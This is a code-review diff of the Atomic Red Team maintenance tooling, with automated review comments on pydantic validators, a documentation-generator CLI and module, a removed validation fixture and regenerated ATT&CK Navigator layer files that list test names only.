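Review bot: the new validator only covers `cleanup_command`, while `command` just above it and `prereq_command` in `Dependency` still go through a bare `constr(min_length=1)`, which accepts a whitespace-only string such as `"  \n"`; either apply the same stripped-empty check to those fields (one `field_validator("command", "cleanup_command", mode="before")` would do) or document why only the cleanup command is checked. Also, the `"loc"` entry in the `PydanticCustomError` context is only substitution data for the message template and does not change the reported error location; a `field_validator` already attaches the field's location, so that key can go.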
@@ -237,7 +247,7 @@ class Atomic(StrictModel):
return v
class Technique(StrictModel):
class Technique(BaseModel):
attack_technique: AttackTechniqueID
display_name: str = Field(..., min_length=5)
atomic_tests: List[Atomic] = Field(min_length=1)
@@ -257,7 +267,10 @@ class Technique(StrictModel):
"empty_dependency_executor_name",
"'dependency_executor_name' shouldn't be empty. Provide a valid value ['manual','powershell', 'sh', "
"'bash', 'command_prompt'] or remove the key from YAML",
{"loc": ["atomic_tests", i, "dependency_executor_name"], "input": value},
{
"loc": ["atomic_tests", i, "dependency_executor_name"],
"input": value,
},
)
return data
+66 -2
View File
@@ -5,18 +5,20 @@ import sys
import urllib.parse
from collections import defaultdict
from functools import partial
from typing import Annotated
from pathlib import Path
from typing import Annotated, Optional
import typer
from pydantic import ValidationError
from atomic_red_team.common import used_guids_file, atomics_path
from atomic_red_team.common import atomics_path, used_guids_file
from atomic_red_team.guid import (
generate_guids_for_yaml,
get_unique_guid,
)
from atomic_red_team.labels import GithubAPI
from atomic_red_team.models import Technique
from atomic_red_team.utils import ATOMIC_RED_TEAM
from atomic_red_team.validator import Validator, format_validation_error, yaml
app = typer.Typer(help="Atomic Red Team Maintenance tool CLI helper")
@@ -107,5 +109,67 @@ def validate():
sys.exit(1)
@app.command()
def generate_docs(
technique_id: Annotated[
Optional[str],
typer.Option(
"--technique", "-t", help="Specific technique ID to generate docs for"
),
] = None,
output_dir: Annotated[
Optional[str],
typer.Option("--output", "-o", help="Output directory for documentation"),
] = None,
full: Annotated[
bool,
typer.Option("--full", "-f", help="Generate all docs including indexes, matrices, and navigator layers"),
] = False,
):
"""Generate Markdown documentation for atomic tests.
Use --full to generate all documentation including:
- Individual technique markdown files
- ATT&CK matrices (markdown)
- Platform-specific indexes (markdown, CSV, YAML)
- ATT&CK Navigator layers (JSON)
"""
if full:
# Generate all documentation including indexes
from atomic_red_team.doc_generator import generate_all_docs
oks, fails = generate_all_docs()
if fails:
sys.exit(len(fails))
return
if output_dir is None:
output_dir = atomics_path
if technique_id:
# Generate docs for a specific technique
technique_id = technique_id.upper()
output_path = Path(output_dir) / technique_id / f"{technique_id}.md"
try:
ATOMIC_RED_TEAM.generate_technique_docs(technique_id, str(output_path))
print(f"Generated documentation for {technique_id} at {output_path}")
except ValueError as e:
print(f"Error: {e}")
sys.exit(1)
else:
# Generate docs for all techniques
count = 0
for atomic_yaml in ATOMIC_RED_TEAM.atomic_tests:
tech_id = atomic_yaml.get("attack_technique", "").upper()
if tech_id:
output_path = Path(output_dir) / tech_id / f"{tech_id}.md"
try:
ATOMIC_RED_TEAM.generate_technique_docs(tech_id, str(output_path))
count += 1
except Exception as e:
print(f"Error generating docs for {tech_id}: {e}")
print(f"Generated documentation for {count} techniques")
if __name__ == "__main__":
app()
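Review bot: `sys.exit(len(fails))` in the `--full` branch is not a reliable failure signal: on POSIX the exit status is truncated to 8 bits, so exactly 256 (or 512, ...) failed techniques exit 0 and CI passes; print the count and exit with a fixed non-zero code, and do the same in the all-techniques branch below, which prints `Error generating docs for ...` but still exits 0. Two smaller points: `--technique` and `--output` are silently ignored when `--full` is given (either honour them or raise `typer.BadParameter`), and the per-technique loop catches bare `Exception` while the single-technique branch catches only `ValueError`, so the two paths report the same failure differently.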
@@ -1,14 +0,0 @@
attack_technique: W1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
random_field: abc123
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
executor:
command: |
echo "ART"
name: command_prompt
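Review bot: this file looks like a negative fixture covering two rejections at once, an `attack_technique` with a non-`T` prefix (`W1003`) and an unknown key (`random_field`) inside an atomic test; with it deleted, and with `extra="forbid"` removed from several models elsewhere in this compare, nothing on this page shows either rejection still being exercised. If a validator test depended on this file, replace it with a fixture (or inline YAML in the test) that keeps both cases covered.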
+374
View File
@@ -0,0 +1,374 @@
"""
Atomic Red Team module for loading and managing atomic tests.
This module provides the AtomicRedTeam class that manages atomic tests,
generates documentation, and provides various utility functions.
Optimized for speed with caching and efficient data structures.
"""
import glob
import re
from concurrent.futures import ProcessPoolExecutor, as_completed
from functools import lru_cache
from pathlib import Path
from typing import Dict, List, Optional, Pattern, Tuple, Union
import yaml # PyYAML is faster than ruamel.yaml for loading
try:
from yaml import CSafeLoader as SafeLoader
except ImportError:
from yaml import SafeLoader
from jinja2 import Environment, FileSystemLoader
from atomic_red_team.attack_api import ATTACK_API
from atomic_red_team.common import atomics_path
ROOT_GITHUB_URL = "https://github.com/redcanaryco/atomic-red-team"
@lru_cache(maxsize=1)
def _get_jinja_env() -> Environment:
"""Get cached Jinja2 environment with custom filters."""
template_dir = Path(__file__).parent
env = Environment(
loader=FileSystemLoader(template_dir),
trim_blocks=True,
lstrip_blocks=True,
auto_reload=False, # Disable auto-reload for speed
)
# Add custom filters
env.filters["get_language"] = get_language
env.filters["cleanup"] = cleanup_for_markdown
env.filters["slugify"] = slugify
env.filters["platform_display"] = get_supported_platform_display
return env
@lru_cache(maxsize=1)
def _get_template():
"""Get cached compiled template."""
return _get_jinja_env().get_template("atomic_doc_template.md.j2")
def get_language(executor: str) -> str:
"""Convert executor name to language identifier for code blocks."""
if executor == "command_prompt":
return "cmd"
elif executor == "manual":
return ""
return executor
def get_supported_platform_display(platform: str) -> str:
"""Convert platform identifier to display name (matches Ruby behavior)."""
# Ruby just capitalizes the first letter, except for 'macos' -> 'macOS'
if platform == "macos":
return "macOS"
return platform.capitalize()
def cleanup_for_markdown(value) -> str:
"""Clean up a value for use in markdown tables."""
if value is None:
return ""
return str(value).strip().replace("\\", "&#92;")
# Pre-compiled regex for slugify
_SLUGIFY_PATTERN = re.compile(r"[`~!@#$%^&*()+=<>?,.\/:;\"'|{}\[\]\\–—]")
def slugify(title: str) -> str:
"""Convert a title to a URL-friendly slug."""
slug = title.lower().replace(" ", "-")
return _SLUGIFY_PATTERN.sub("", slug)
def _load_yaml_file(path: str) -> Optional[dict]:
"""Load a YAML file using fast PyYAML loader."""
try:
with open(path, "r", encoding="utf-8") as f:
return yaml.load(f, Loader=SafeLoader)
except Exception:
return None
class AtomicRedTeam:
"""
Main class for managing Atomic Red Team tests.
Provides methods for loading atomic tests, generating documentation,
and validating YAML files. Optimized for speed.
"""
def __init__(self, atomics_directory: Optional[str] = None):
"""
Initialize the AtomicRedTeam instance.
Args:
atomics_directory: Path to the atomics directory.
Defaults to the standard atomics path.
"""
self.atomics_directory = atomics_directory or atomics_path
self._atomic_tests: Optional[List[dict]] = None
self._atomic_tests_by_id: Optional[Dict[str, dict]] = None
self._only_platform: Pattern = re.compile(r".*")
@property
def only_platform(self) -> Pattern:
"""Get the current platform filter pattern."""
return self._only_platform
@only_platform.setter
def only_platform(self, pattern: Pattern):
"""Set the platform filter pattern."""
self._only_platform = pattern
@property
def atomic_test_paths(self) -> List[str]:
"""Returns a list of paths that contain Atomic Tests."""
pattern = f"{self.atomics_directory}/T*/T*.yaml"
return sorted(glob.glob(pattern))
@property
def atomic_tests(self) -> List[dict]:
"""
Returns a list of Atomic Tests in Atomic Red Team (as dicts from source YAML).
"""
if self._atomic_tests is not None:
return self._atomic_tests
self._atomic_tests = []
for path in self.atomic_test_paths:
atomic_yaml = _load_yaml_file(path)
if atomic_yaml:
atomic_yaml["atomic_yaml_path"] = path
self._atomic_tests.append(atomic_yaml)
return self._atomic_tests
def _get_atomic_by_id(self, technique_id: str) -> Optional[dict]:
"""Get atomic test by technique ID using cached index."""
if self._atomic_tests_by_id is None:
self._atomic_tests_by_id = {}
for test in self.atomic_tests:
tid = test.get("attack_technique", "").upper()
if tid:
self._atomic_tests_by_id[tid] = test
return self._atomic_tests_by_id.get(technique_id.upper())
def atomic_tests_for_technique(
self, technique_or_identifier: Union[str, dict]
) -> List[dict]:
"""
Returns the individual Atomic Tests for a given identifier.
Args:
technique_or_identifier: Either a technique ID string (e.g., "T1234")
or an ATT&CK technique object.
Returns:
List of atomic test dictionaries.
"""
if isinstance(technique_or_identifier, dict):
technique_identifier = ATTACK_API.technique_identifier_for_technique(
technique_or_identifier
)
else:
technique_identifier = technique_or_identifier
atomic_yaml = self._get_atomic_by_id(technique_identifier)
return atomic_yaml.get("atomic_tests", []) if atomic_yaml else []
def atomic_tests_for_technique_by_platform(
self, technique_or_identifier: Union[str, dict], platform: str
) -> List[dict]:
"""
Returns the individual Atomic Tests for a given identifier filtered by platform.
Args:
technique_or_identifier: Either a technique ID string (e.g., "T1234")
or an ATT&CK technique object.
platform: Platform to filter by (e.g., "windows", "linux", "macos").
Returns:
List of atomic test dictionaries matching the platform.
"""
tests = self.atomic_tests_for_technique(technique_or_identifier)
return [t for t in tests if platform in t.get("supported_platforms", [])]
def atomic_yaml_has_test_for_platform(
self, yaml_file: str, only_platform: Pattern
) -> bool:
"""
Check if a YAML file has tests for a given platform.
Args:
yaml_file: Path to the YAML file.
only_platform: Regex pattern to match platforms.
Returns:
True if the file has tests for the platform.
"""
yaml_path = Path(yaml_file)
if not yaml_path.exists():
return False
data = _load_yaml_file(str(yaml_path))
if not data or "atomic_tests" not in data:
return False
for atomic in data["atomic_tests"]:
for platform in atomic.get("supported_platforms", []):
if only_platform.match(platform.lower()):
return True
return False
def github_link_to_technique(
self,
technique: dict,
include_identifier: bool = False,
only_platform: Optional[Pattern] = None,
) -> str:
"""
Returns a Markdown formatted GitHub link to a technique.
This will be to the edit page for techniques that already have one or more
Atomic Red Team tests, or the create page for techniques that have no
existing tests for the given OS.
Args:
technique: ATT&CK technique dictionary.
include_identifier: Whether to include the technique ID in the link text.
only_platform: Platform pattern filter. Defaults to instance's only_platform.
Returns:
Markdown formatted link string.
"""
if only_platform is None:
only_platform = self._only_platform
technique_identifier = ATTACK_API.technique_identifier_for_technique(
technique
).upper()
# Use display_name from atomic YAML if available (has full name for sub-techniques)
atomic_yaml = self._get_atomic_by_id(technique_identifier)
if atomic_yaml:
technique_name = atomic_yaml.get("display_name", technique.get("name", ""))
else:
technique_name = technique.get("name", "")
link_display = technique_name
if include_identifier:
link_display = f"{technique_identifier} {technique_name}"
yaml_file = f"{self.atomics_directory}/{technique_identifier}/{technique_identifier}.yaml"
markdown_file = f"{self.atomics_directory}/{technique_identifier}/{technique_identifier}.md"
if (
self.atomic_yaml_has_test_for_platform(yaml_file, only_platform)
and Path(markdown_file).exists()
):
return f"[{link_display}](../../{technique_identifier}/{technique_identifier}.md)"
else:
return f"{link_display} [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)"
def generate_technique_docs(
self, technique_identifier: str, output_path: Optional[str] = None
) -> str:
"""
Generate Markdown documentation for a technique.
Args:
technique_identifier: The technique ID (e.g., "T1059").
output_path: Optional path to write the output. If None, returns the content.
Returns:
The generated Markdown content.
"""
technique_identifier = technique_identifier.upper()
# Find the atomic YAML using cached index
atomic_yaml = self._get_atomic_by_id(technique_identifier)
if not atomic_yaml:
raise ValueError(
f"No atomic tests found for technique {technique_identifier}"
)
# Get technique info from ATT&CK for description
technique_info = ATTACK_API.technique_info(technique_identifier)
technique = {
"identifier": technique_identifier,
"name": atomic_yaml.get("display_name", ""),
"description": technique_info.get("description", "") if technique_info else "",
}
# Render using cached template
template = _get_template()
content = template.render(
technique=technique,
atomic_yaml=atomic_yaml,
)
content = content.rstrip() + "\n"
if output_path:
Path(output_path).write_text(content, encoding="utf-8")
return content
def generate_all_docs(self, parallel: bool = True) -> Dict[str, str]:
"""
Generate documentation for all techniques.
Args:
parallel: Whether to use parallel processing.
Returns:
Dictionary mapping technique IDs to their generated documentation.
"""
docs = {}
technique_ids = [
test.get("attack_technique", "").upper()
for test in self.atomic_tests
if test.get("attack_technique")
]
if parallel:
# Use parallel processing
# Create a standalone function for ProcessPoolExecutor
def _generate_doc_worker(args: Tuple[str, str]) -> Tuple[str, str]:
technique_id, atomics_directory = args
from atomic_red_team.utils import AtomicRedTeam
art = AtomicRedTeam(atomics_directory=atomics_directory)
return (technique_id, art.generate_technique_docs(technique_id))
with ProcessPoolExecutor() as executor:
future_to_id = {
executor.submit(_generate_doc_worker, (tid, self.atomics_directory)): tid
for tid in technique_ids
}
for future in as_completed(future_to_id):
tid = future_to_id[future]
try:
docs[tid] = future.result()
except Exception as e:
print(f"Error generating docs for {tid}: {e}")
else:
# Sequential processing
for tid in technique_ids:
try:
docs[tid] = self.generate_technique_docs(tid)
except Exception as e:
print(f"Error generating docs for {tid}: {e}")
return docs
# Singleton instance for convenience
ATOMIC_RED_TEAM = AtomicRedTeam()
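Review bot: `_generate_doc_worker` inside `generate_all_docs` is a nested function, but `ProcessPoolExecutor.submit` has to pickle the callable to ship it to the worker process, and local functions cannot be pickled, so in the `parallel=True` path every submission fails and is swallowed by the `except Exception` branch as "Error generating docs for ..." while `docs` comes back empty; move the worker to module level (the comment above it already says "standalone function"), which also removes the need for the in-function `from atomic_red_team.utils import AtomicRedTeam` re-import. Separately, `_load_yaml_file` catches bare `Exception` and returns `None`, so a malformed or unreadable atomic YAML silently disappears from `atomic_tests` and from the `_get_atomic_by_id` index; narrow the handler to `yaml.YAMLError` and `OSError` and log the offending path, since these files are community-contributed and a parse failure is exactly what the validation step should surface rather than hide. Minor: the error paths use `print` rather than `logging`, and `test.get("attack_technique", "").upper()` in `_get_atomic_by_id` and `generate_all_docs` raises `AttributeError` if the key is present with a null value.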
@@ -1 +1 @@
{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"comment":"\n- Azure AD - Add Company Administrator Role to a user\n- Simulate - Post BEC persistence via user password reset followed by user added to company administrator role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":2,"enabled":true,"comment":"\n- Azure AD - Create a new user\n- Azure AD - Create a new user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1531","score":2,"enabled":true,"comment":"\n- Azure AD - Delete user via Azure AD PowerShell\n- Azure AD - Delete user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
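Review bot: The only difference between the old and new Azure-AD layer is the version block (`"attack":"16"` to `"18"`, `"navigator":"5.1.0"` to `"5.3.0"`); the `techniques` array, scores and comments are byte-identical, so confirm the layer was regenerated against the ATT&CK v18 dataset rather than the version strings being rewritten, since the technique set and scores are supposed to be re-derived on each run. Because the file is a single-line JSON document, every regeneration shows up as a whole-file rewrite that hides what actually changed; emitting it with indentation would make future diffs of these layers reviewable. Same remark applies to the Containers, Google-Workspace and AWS layers below.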
{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"comment":"\n- Azure AD - Add Company Administrator Role to a user\n- Simulate - Post BEC persistence via user password reset followed by user added to company administrator role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":2,"enabled":true,"comment":"\n- Azure AD - Create a new user\n- Azure AD - Create a new user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1531","score":2,"enabled":true,"comment":"\n- Azure AD - Delete user via Azure AD PowerShell\n- Azure AD - Delete user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
@@ -1 +1 @@
{"name":"Atomic Red Team (Containers)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At - Schedule a job via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1105","score":1,"enabled":true,"comment":"\n- Curl Insecure Connection from a Pod\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":1,"enabled":true,"comment":"\n- Create a Linux user via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1195.002","score":1,"enabled":true,"comment":"\n- Simulate npm package installation on a Linux system\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195.002/T1195.002.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":3,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n- Privilege 
Escalation via Docker Volume Mapping\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":2,"enabled":true,"comment":"\n- Docker Container and Resource Discovery\n- Podman Container and Resource Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
{"name":"Atomic Red Team (Containers)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At - Schedule a job via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1105","score":1,"enabled":true,"comment":"\n- Curl Insecure Connection from a Pod\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":1,"enabled":true,"comment":"\n- Create a Linux user via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1195.002","score":1,"enabled":true,"comment":"\n- Simulate npm package installation on a Linux system\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195.002/T1195.002.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- 